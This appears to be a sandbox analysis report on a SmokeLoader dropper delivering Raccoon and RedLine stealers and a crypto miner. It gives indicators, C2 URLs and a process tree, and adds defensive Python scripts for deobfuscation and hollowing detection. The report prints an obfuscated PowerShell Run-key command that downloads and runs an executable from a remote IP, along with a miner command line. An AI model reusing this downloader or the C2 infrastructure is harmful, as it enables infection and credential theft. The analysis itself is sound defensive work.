Analysis
max time kernel: 143s
max time network: 157s
platform: windows10_x64
resource: win10v20210410
submitted: 11-08-2021 20:01

Static task: static1
Behavioral task: behavioral1
  Sample: d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe
  Resource: win7v20210410
Behavioral task: behavioral2
  Sample: d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe
  Resource: win10v20210410
General
Target: d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe
Size: 207KB
MD5: 4a24658b8b28d1512378d374676846dc
SHA1: 1d326b774e7f11bcaffbdb4198db8cc47735e808
SHA256: d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a70270e30e666c9baa7d
SHA512: c762af1ea682cfa41bdb211a74cce91600da32ccace258e6dd0b2ed9eb02bad2d01922ef9ccc00a6b1c909d8fe7e3955ded408a0f643da75fcfbb805de4b6d3c
Malware Config
Extracted: http://91.241.19.52/Api/GetFile2
Extracted: smokeloader
Version: 2020
C2 URLs (30, the same ten names under three TLDs):
http://readinglistforjuly1.xyz/
http://readinglistforjuly2.xyz/
http://readinglistforjuly3.xyz/
http://readinglistforjuly4.xyz/
http://readinglistforjuly5.xyz/
http://readinglistforjuly6.xyz/
http://readinglistforjuly7.xyz/
http://readinglistforjuly8.xyz/
http://readinglistforjuly9.xyz/
http://readinglistforjuly10.xyz/
http://readinglistforjuly1.site/
http://readinglistforjuly2.site/
http://readinglistforjuly3.site/
http://readinglistforjuly4.site/
http://readinglistforjuly5.site/
http://readinglistforjuly6.site/
http://readinglistforjuly7.site/
http://readinglistforjuly8.site/
http://readinglistforjuly9.site/
http://readinglistforjuly10.site/
http://readinglistforjuly1.club/
http://readinglistforjuly2.club/
http://readinglistforjuly3.club/
http://readinglistforjuly4.club/
http://readinglistforjuly5.club/
http://readinglistforjuly6.club/
http://readinglistforjuly7.club/
http://readinglistforjuly8.club/
http://readinglistforjuly9.club/
http://readinglistforjuly10.club/
Extracted: raccoon
2ca2376c561d1af7f8b9e6f3256b06220a3db187
url4cnc: https://telete.in/johnyes13
Extracted: raccoon
cd8dc1031358b1aec55cc6bc447df1018b068607
url4cnc: https://telete.in/jagressor_kz
Extracted: raccoon
471c70de3b4f9e4d493e418d1f60a90659057de0
url4cnc: https://telete.in/p1rosto100xx
Signatures
-
Process spawned unexpected child process 4 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes: schtasks.exe (4 instances)
description | pid | pid_target | process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4792 | 1116 | schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4300 | 1116 | schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4388 | 1116 | schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4728 | 1116 | schtasks.exe
-
Raccoon Stealer Payload 6 IoCs
resource | yara_rule
behavioral2/memory/3612-200-0x0000000000400000-0x0000000002CB1000-memory.dmp | family_raccoon
behavioral2/memory/3612-203-0x0000000004810000-0x00000000048A3000-memory.dmp | family_raccoon
behavioral2/memory/3872-204-0x0000000000400000-0x0000000002CB0000-memory.dmp | family_raccoon
behavioral2/memory/3872-206-0x0000000004940000-0x00000000049D1000-memory.dmp | family_raccoon
behavioral2/memory/4448-285-0x0000000000400000-0x0000000000495000-memory.dmp | family_raccoon
behavioral2/memory/4448-289-0x0000000000400000-0x0000000000495000-memory.dmp | family_raccoon
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\BD9B.exe | family_redline
C:\Users\Admin\AppData\Local\Temp\BD9B.exe | family_redline
C:\Users\Admin\AppData\Local\Temp\CF70.exe | family_redline
C:\Users\Admin\AppData\Local\Temp\CF70.exe | family_redline
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
Processes: WerFault.exe (2 instances)
description | pid | process | target process
PID 3380 created 3612 | 3380 | WerFault.exe | D25F.exe
PID 900 created 3872 | 900 | WerFault.exe | D399.exe
-
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Blocklisted process makes network request 1 IoCs
Processes: powershell.exe
flow | pid | process
40 | 4256 | powershell.exe
-
Downloads MZ/PE file
-
Executes dropped EXE 55 IoCs
Processes: AEE3.exe, B472.exe, B472.tmp, BD9B.exe, C1B3.exe, fsucenter.exe, C628.exe, CF70.exe, Runtimebroker.exe, D25F.exe, D399.exe, cheat.exe, Database.exe, install.exe, HostData.exe, smss.exe, fajaeit
pid | process (in launch order)
2620 AEE3.exe, 3524 B472.exe, 1116 B472.tmp, 4044 B472.exe, 1572 B472.tmp, 3880 BD9B.exe,
2928 C1B3.exe, 4020 fsucenter.exe, 2624 C628.exe, 3376 CF70.exe, 1112 Runtimebroker.exe,
3612 D25F.exe, 3872 D399.exe, 4448 C628.exe, 4516 cheat.exe, 2616 install.exe, 4408 HostData.exe,
4500 install.exe, 4720 smss.exe, 4924 fajaeit
Database.exe (35 launches; some PIDs appear more than once): 4224, 2596, 2268, 4428, 2608, 800, 4764, 4656, 4776, 4820, 2964, 580, 4972, 5012, 5048, 192, 4976, 4284, 4240, 3760, 4360, 2268, 4432, 2308, 3164, 3944, 800, 4412, 4384, 2620, 2964, 1316, 580, 4172, 5004
-
Checks BIOS information in registry 2 TTPs 64 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes: Database.exe (multiple instances), BD9B.exe, CF70.exe
description | ioc | process (event count)
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Database.exe (31), BD9B.exe (1), CF70.exe (1)
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | Database.exe (29), BD9B.exe (1), CF70.exe (1)
-
Deletes itself 1 IoCs
pid | process
2680 | (process name not recorded)
-
Drops startup file 1 IoCs
Processes: Runtimebroker.exe
description | ioc | process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound device.lnk | Runtimebroker.exe
-
Loads dropped DLL 1 IoCs
Processes: fsucenter.exe
pid | process
4020 | fsucenter.exe
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida-packed payload (the signature title is missing on this page; the label follows from the yara_rule column) 6 IoCs
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\BD9B.exe | themida
C:\Users\Admin\AppData\Local\Temp\BD9B.exe | themida
behavioral2/memory/3880-147-0x0000000000F00000-0x0000000000F01000-memory.dmp | themida
C:\Users\Admin\AppData\Local\Temp\CF70.exe | themida
C:\Users\Admin\AppData\Local\Temp\CF70.exe | themida
behavioral2/memory/3376-184-0x0000000000240000-0x0000000000241000-memory.dmp | themida
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 5 IoCs
Processes: install.exe, powershell.exe
description | ioc | process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Setup Files\\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\\explorer.exe\"" | install.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\ProgramData\\Desktop\\Idle.exe\"" | install.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\Sound device = "Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile(('http://91.241.19.52/Ru'+'nti'+'m'+'ebr'+'oke'+'r.exe'),($env:TEMP+'\\Vp'+'nm.e'+'xe'));Start-Process ($env:TEMP+'\\V'+'pn'+'m.exe')" | powershell.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Windows\\System32\\dhcpcmonitor\\dllhost.exe\"" | install.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Users\\All Users\\Mozilla\\updates\\308046B0AF4A39CB\\smss.exe\"" | install.exe
-
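The "Sound device" Run value above is a PowerShell downloader whose URL and drop path are split into '+'-joined literals, so a plain registry search for Runtimebroker.exe or Vpnm.exe finds nothing; joined back together the pieces read http://91.241.19.52/Runtimebroker.exe (the same host as the extracted http://91.241.19.52/Api/GetFile2 config URL) and %TEMP%\Vpnm.exe. The script below recovers those strings from the value statically, without running it. It is an added example, not code from the sandbox or the report; the registry value is transcribed from the row above with the report's doubled backslashes undone, and the benign value and the function names are constructed for the demo.

```python
"""Statically recover the URL and drop path hidden by '+' string concatenation
in a PowerShell Run-key value. Added example; the malicious value is transcribed
from the report, everything else is constructed."""
import re
from typing import Optional

# Transcribed from the "Sound device" Run value. The report shows backslashes
# doubled ('\\Vp'); the value as stored in the registry has single backslashes.
SOUND_DEVICE_RUN_VALUE = (
    r"Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient)"
    r".DownloadFile(('http://91.241.19.52/Ru'+'nti'+'m'+'ebr'+'oke'+'r.exe'),"
    r"($env:TEMP+'\Vp'+'nm.e'+'xe'));Start-Process ($env:TEMP+'\V'+'pn'+'m.exe')"
)
# Constructed: an ordinary autorun entry, for contrast.
BENIGN_RUN_VALUE = r'"C:\Program Files\Example\updater.exe" /background'

# One operand of a PowerShell '+' expression: a single-quoted literal or an
# environment-variable reference such as $env:TEMP.
_OPERAND = r"(?:'[^']*'|\$env:[A-Za-z_][A-Za-z0-9_]*)"
# A parenthesised chain of operands joined by '+', e.g. ('Ru'+'nti'+'m').
_CONCAT = re.compile(r"\(\s*(" + _OPERAND + r"(?:\s*\+\s*" + _OPERAND + r")*)\s*\)")


def _join(chain: str) -> str:
    """Evaluate 'a'+'b'+$env:X into one string. Literals are unquoted; variables
    stay symbolic because this is analysis, not execution."""
    parts = re.findall(_OPERAND, chain)
    return "".join(p[1:-1] if p.startswith("'") else p for p in parts)


def collapse_concat(script: str) -> str:
    """Replace every ('x'+'y'+...) group with the joined string."""
    return _CONCAT.sub(lambda m: _join(m.group(1)), script)


def is_powershell_launcher(value: str) -> bool:
    """Case-insensitive: invokes powershell with a hidden window. The mixed case
    (POwERsheLl, -WinD HIDDen) is exactly what defeats exact-string matching,
    and -WinD is the abbreviated form of -WindowStyle."""
    low = value.lower()
    return "powershell" in low and re.search(r"-wi\w*\s+hid", low) is not None


def extract_iocs(value: str) -> Optional[dict]:
    """URLs and %TEMP%-relative paths a PowerShell launcher would use, or None
    when the value does not look like one."""
    if not is_powershell_launcher(value):
        return None
    plain = collapse_concat(value)
    urls = sorted(set(re.findall(r"https?://[^\s'\"(),;]+", plain)))
    paths = sorted(set(re.findall(r"\$env:\w+\\[^\s'\"(),;]+", plain)))
    return {"deobfuscated": plain, "urls": urls, "paths": paths}


if __name__ == "__main__":
    for name, value in (("Sound device", SOUND_DEVICE_RUN_VALUE), ("benign", BENIGN_RUN_VALUE)):
        print(name, "->", extract_iocs(value))
```

Run against the two values it prints the recovered URL and path for "Sound device" and None for the benign entry. The joiner deliberately stops at single-quoted literals and $env: references; PowerShell has many other ways to build a string (format operator, -join, [char] casts, base64 -EncodedCommand), so treat a value that mentions powershell but yields no URL as something to look at by hand, not as clean.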
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
Note that every row recorded under this signature is a read of the EnableLUA policy value (whether UAC is on), not of an Uninstall key.
Processes: Database.exe (multiple instances), BD9B.exe, CF70.exe
description | ioc | process (event count, 37 rows listed on this page)
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | Database.exe (35), BD9B.exe (1), CF70.exe (1)
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 3 IoCs
Processes: install.exe
description | ioc | process
File created | C:\Windows\SysWOW64\dhcpcmonitor\dllhost.exe | install.exe
File opened for modification | C:\Windows\SysWOW64\dhcpcmonitor\dllhost.exe | install.exe
File created | C:\Windows\SysWOW64\dhcpcmonitor\5940a34987c99120d96dace90a3f93f329dcad63 | install.exe
The SysWOW64 path here and the WOW6432Node Run key above show install.exe is a 32-bit process subject to file-system and registry redirection: its Run value names C:\Windows\System32\dhcpcmonitor\dllhost.exe, but the file it wrote lives under SysWOW64, which is where a 32-bit loader of that value will also be redirected.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
Processes: BD9B.exe, CF70.exe, Database.exe (multiple instances)
pid | process | events
3880 | BD9B.exe | 1
3376 | CF70.exe | 1
4224, 2596, 2268, 4428, 2608, 800, 4764, 4656, 4776, 4820, 2964, 580, 4972, 5012, 5048, 192, 4976, 4284, 4240, 3760 | Database.exe | 3 each
4360 | Database.exe | 2 (list cut off at 64 rows)
-
Suspicious use of SetThreadContext 3 IoCs
Processes: d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe, C628.exe, install.exe
description | pid | process | target process
PID 1852 set thread context of 2256 | 1852 | d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe | d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe
PID 2624 set thread context of 4448 | 2624 | C628.exe | C628.exe
PID 2616 set thread context of 4500 | 2616 | install.exe | install.exe
-
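Two of the signatures on this page fall straight out of ordinary process telemetry: the four schtasks.exe launches that "Process spawned unexpected child process" attributes to WmiPrvSE.exe, and the three SetThreadContext rows just above, in each of which the target is a second instance of the acting process's own image (the sample into itself, C628.exe into C628.exe, install.exe into install.exe). Together with the WriteProcessMemory rows for 1852 into 2256 that is the process-hollowing sequence, and the Raccoon YARA hits on PID 4448 are in the hollowed C628.exe child. The script below runs both checks over a constructed event list. It is an added example, not the sandbox's own detection logic; the events reuse the PIDs and image names the report lists (the report pairs each schtasks.exe PID with PID 1116 and names wmiprvse.exe as its parent), while the event schema, the allow-list and the WerFault.exe event are assumptions.

```python
"""Process-telemetry checks built from this report's PIDs: unexpected children
of WmiPrvSE.exe, and self-spawn followed by SetThreadContext (process hollowing).

Added example. The events are constructed from the report; the schema, the
allow-list and the WerFault.exe event are assumptions for the demo."""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple

SAMPLE = "d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe"


@dataclass(frozen=True)
class Event:
    kind: str          # "create", "write_memory" or "set_thread_context"
    pid: int           # acting process (parent, or the process doing the injecting)
    image: str         # its image name as the report shows it
    target_pid: int    # child, or the process being written to
    target_image: str


# Constructed from the report's rows; PIDs and image names are the report's.
EVENTS: List[Event] = [
    # The sample starts a second copy of itself, writes into it and swaps a thread context.
    Event("create", 1852, SAMPLE, 2256, SAMPLE),
    Event("write_memory", 1852, SAMPLE, 2256, SAMPLE),
    Event("set_thread_context", 1852, SAMPLE, 2256, SAMPLE),
    # Inno Setup bootstrap: parent and child are different images, so not hollowing.
    Event("create", 3524, "B472.exe", 1116, "B472.tmp"),
    Event("write_memory", 3524, "B472.exe", 1116, "B472.tmp"),
    # Dropped payloads repeat the self-spawn pattern (no write event survived the 64-row cap).
    Event("create", 2624, "C628.exe", 4448, "C628.exe"),
    Event("set_thread_context", 2624, "C628.exe", 4448, "C628.exe"),
    Event("create", 2616, "install.exe", 4500, "install.exe"),
    Event("set_thread_context", 2616, "install.exe", 4500, "install.exe"),
    # The four schtasks.exe launches the report attributes to WmiPrvSE.exe (PID 1116).
    Event("create", 1116, "wmiprvse.exe", 4792, "schtasks.exe"),
    Event("create", 1116, "wmiprvse.exe", 4300, "schtasks.exe"),
    Event("create", 1116, "wmiprvse.exe", 4388, "schtasks.exe"),
    Event("create", 1116, "wmiprvse.exe", 4728, "schtasks.exe"),
    # Constructed for contrast: a crash handler the WMI host may legitimately start.
    Event("create", 1116, "wmiprvse.exe", 9001, "WerFault.exe"),
]

# WmiPrvSE.exe normally launches nothing of its own: a child means either a
# Win32_Process.Create call or a crash hand-off to WerFault.exe. Assumed allow-list.
EXPECTED_CHILDREN: Dict[str, Set[str]] = {"wmiprvse.exe": {"werfault.exe"}}


def unexpected_children(events: List[Event]) -> List[Tuple[int, str, int, str]]:
    """Every (parent_pid, parent_image, child_pid, child_image) where a watched
    parent started something outside its allow-list, in event order."""
    hits = []
    for e in events:
        if e.kind != "create":
            continue
        allowed = EXPECTED_CHILDREN.get(e.image.lower())
        if allowed is not None and e.target_image.lower() not in allowed:
            hits.append((e.pid, e.image, e.target_pid, e.target_image))
    return hits


def hollowing_candidates(events: List[Event]) -> List[Tuple[int, int, str, bool]]:
    """(parent_pid, child_pid, image, saw_write) for each process that created a
    child of its own image and then called SetThreadContext on it. A
    WriteProcessMemory event on the same pair corroborates the verdict but is
    not required, since capped telemetry (as in this report) often drops it."""
    created: Dict[Tuple[int, int], Tuple[bool, str]] = {}
    seen: Dict[Tuple[int, int], Set[str]] = defaultdict(set)
    for e in events:
        pair = (e.pid, e.target_pid)
        if e.kind == "create":
            created[pair] = (e.image.lower() == e.target_image.lower(), e.image)
        else:
            seen[pair].add(e.kind)
    return sorted(
        (parent, child, image, "write_memory" in seen[(parent, child)])
        for (parent, child), (same_image, image) in created.items()
        if same_image and "set_thread_context" in seen[(parent, child)]
    )


if __name__ == "__main__":
    for hit in unexpected_children(EVENTS):
        print("unexpected child:", hit)
    for hit in hollowing_candidates(EVENTS):
        print("hollowing candidate:", hit)
```

On this event list the first check returns the four schtasks.exe launches and ignores the WerFault.exe one; the second returns the three self-spawn pairs, with only the sample's own pair corroborated by a write event, and leaves the B472.exe to B472.tmp installer pair alone because the images differ. Keying on (parent, child) PID pairs rather than on PIDs alone matters in data like this report's, where PIDs such as 1116 and 2620 are reused by later processes.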
Drops file in Program Files directory 2 IoCs
Processes: install.exe
description | ioc | process
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Setup Files\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\explorer.exe | install.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Setup Files\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\7a0fd90576e08807bde2cc57bcf9854bbce05fe3 | install.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 22 IoCs
Processes: WerFault.exe (22 instances)
pid | pid_target | process | target process, grouped by the crashing process:
C1B3.exe (pid 2928): WerFault.exe pids 3816, 3336, 808, 4016, 2620, 3708
D25F.exe (pid 3612): WerFault.exe pids 808, 3552, 800, 2620, 3380
Runtimebroker.exe (pid 1112): WerFault.exe pids 3176, 3000, 1016, 1744, 2632, 3076
D399.exe (pid 3872): WerFault.exe pids 1264, 1000, 1760, 2596, 900
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes: d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe
description | ioc | process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe
-
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes: schtasks.exe (4 instances)
pid | process
4728 | schtasks.exe
4792 | schtasks.exe
4300 | schtasks.exe
4388 | schtasks.exe
-
Modifies registry class 2 IoCs
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance | (not recorded)
Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance | (not recorded)
-
Modifies system certificate store 2 IoCs (title taken from the fsucenter.exe entry in the process tree below)
Processes: fsucenter.exe
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | fsucenter.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (certificate blob not shown on this page) | fsucenter.exe
AuthRoot is the store that Windows' automatic root update fills in when a signed binary's chain is first validated, so a root appearing there while an installer runs is common and is not by itself an indicator; check the thumbprint against the known Microsoft-trusted roots before treating it as one.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid | process
2256 | d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe (2 events)
2680 | (process name not recorded; all remaining events)
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid | process
2680 | (process name not recorded)
-
Suspicious behavior: MapViewOfSection 19 IoCs
pid | process
2256 | d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe (1 event)
2680 | (process name not recorded; 18 events)
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes: WerFault.exe, BD9B.exe
description | pid | process
Token: SeShutdownPrivilege and Token: SeCreatePagefilePrivilege, alternating | 2680 | (process name not recorded; the bulk of the 64 events)
Token: SeRestorePrivilege | 3816 | WerFault.exe
Token: SeBackupPrivilege | 3816 | WerFault.exe
Token: SeDebugPrivilege | 3880 | BD9B.exe
Token: SeDebugPrivilege | 3816, 3336, 808, 4016, 2620, 3708 | WerFault.exe (one event each)
-
Suspicious use of FindShellTrayWindow 1 IoCs
Processes: B472.tmp
pid | process
1572 | B472.tmp
-
Suspicious use of SetWindowsHookEx 1 IoCs
Processes: AEE3.exe
pid | process
2620 | AEE3.exe
-
Suspicious use of UnmapMainImage 1 IoCs
pid | process
2680 | (process name not recorded)
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes: d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe, B472.exe, B472.tmp, C1B3.exe, Runtimebroker.exe
pid | process | target pid | target process | events
1852 | d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe | 2256 | d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe | 6
2680 | (not recorded) | 2620 | AEE3.exe | 3
2680 | (not recorded) | 3524 | B472.exe | 3
3524 | B472.exe | 1116 | B472.tmp | 3
1116 | B472.tmp | 4044 | B472.exe | 3
4044 | B472.exe | 1572 | B472.tmp | 3
2680 | (not recorded) | 3880 | BD9B.exe | 3
2680 | (not recorded) | 2928 | C1B3.exe | 3
1572 | B472.tmp | 4020 | fsucenter.exe | 3
2680 | (not recorded) | 2624 | C628.exe | 3
2680 | (not recorded) | 3376 | CF70.exe | 3
2928 | C1B3.exe | 1112 | Runtimebroker.exe | 3
2680 | (not recorded) | 3612 | D25F.exe | 3
2680 | (not recorded) | 3872 | D399.exe | 3
2680 | (not recorded) | 2420 | explorer.exe | 4
2680 | (not recorded) | 2580 | explorer.exe | 3
2680 | (not recorded) | 2264 | explorer.exe | 4
2680 | (not recorded) | 2420 | explorer.exe | 3
1112 | Runtimebroker.exe | 2616 | powershell.exe | 3
2680 | (not recorded) | 3180 | explorer.exe | 2 (list cut off at 64 rows)
-
Processes

- [1] C:\Users\Admin\AppData\Local\Temp\d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe"
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  - [2] C:\Users\Admin\AppData\Local\Temp\d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe"
    - Checks SCSI registry key(s)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
- [1] C:\Users\Admin\AppData\Local\Temp\AEE3.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\AEE3.exe
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
- [1] C:\Users\Admin\AppData\Local\Temp\B472.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\B472.exe
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  - [2] C:\Users\Admin\AppData\Local\Temp\is-5EMF5.tmp\B472.tmp
    Command line: "C:\Users\Admin\AppData\Local\Temp\is-5EMF5.tmp\B472.tmp" /SL5="$B0058,4193427,831488,C:\Users\Admin\AppData\Local\Temp\B472.exe"
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    - [3] C:\Users\Admin\AppData\Local\Temp\B472.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\B472.exe" /VERYSILENT
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
      - [4] C:\Users\Admin\AppData\Local\Temp\is-12HDI.tmp\B472.tmp
        Command line: "C:\Users\Admin\AppData\Local\Temp\is-12HDI.tmp\B472.tmp" /SL5="$E0052,4193427,831488,C:\Users\Admin\AppData\Local\Temp\B472.exe" /VERYSILENT
        - Executes dropped EXE
        - Suspicious use of FindShellTrayWindow
        - Suspicious use of WriteProcessMemory
        - [5] C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\fsucenter.exe
          Command line: "C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\fsucenter.exe"
          - Executes dropped EXE
          - Loads dropped DLL
          - Modifies system certificate store
          - [6] C:\ProgramData\Data\Database.exe (3 instances, identical command line and signatures)
            Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
            - Executes dropped EXE
            - Checks BIOS information in registry
            - Checks whether UAC is enabled
            - Suspicious use of NtSetInformationThreadHideFromDebugger
          - [6] C:\ProgramData\Data\install.exe
            Command line: "C:\ProgramData\Data\install.exe"
            - Executes dropped EXE
            - Suspicious use of SetThreadContext
            - [7] C:\ProgramData\Data\install.exe
              Command line: "C:\ProgramData\Data\install.exe"
              - Executes dropped EXE
              - Adds Run key to start application
              - Drops file in System32 directory
              - Drops file in Program Files directory
              - [8] C:\Users\All Users\Mozilla\updates\308046B0AF4A39CB\smss.exe
                Command line: "C:\Users\All Users\Mozilla\updates\308046B0AF4A39CB\smss.exe"
                - Executes dropped EXE
          - [6] C:\ProgramData\Systemd\HostData.exe
            Command line: NULL
            - Executes dropped EXE
          - [6] C:\ProgramData\Data\Database.exe (18 instances, identical command line and signatures)
            Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
            - Executes dropped EXE
            - Checks BIOS information in registry
            - Checks whether UAC is enabled
            - Suspicious use of NtSetInformationThreadHideFromDebugger
          - [6] C:\ProgramData\Data\Database.exe (14 instances, identical command line and signatures)
            Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
            - Executes dropped EXE
            - Checks BIOS information in registry
            - Checks whether UAC is enabled
          - [6] C:\ProgramData\Data\Database.exe (8 instances, identical command line, no signatures)
            Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
- [1] C:\Users\Admin\AppData\Local\Temp\BD9B.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\BD9B.exe
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of AdjustPrivilegeToken
- [1] C:\Users\Admin\AppData\Local\Temp\C1B3.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\C1B3.exe
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  - [2] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2928 -s 876
    - Program crash
    - Suspicious use of AdjustPrivilegeToken
  - [2] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2928 -s 884
    - Program crash
    - Suspicious use of AdjustPrivilegeToken
  - [2] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2928 -s 924
    - Program crash
  - [2] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2928 -s 904
    - Program crash
    - Suspicious use of AdjustPrivilegeToken
  - [2] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2928 -s 916
    - Program crash
  - [2] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2928 -s 876
    - Program crash
    - Suspicious use of AdjustPrivilegeToken
  - [2] C:\ProgramData\Runtimebroker.exe
    Command line: "C:\ProgramData\Runtimebroker.exe"
    - Executes dropped EXE
    - Drops startup file
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\SysWOW64\WerFault.exe
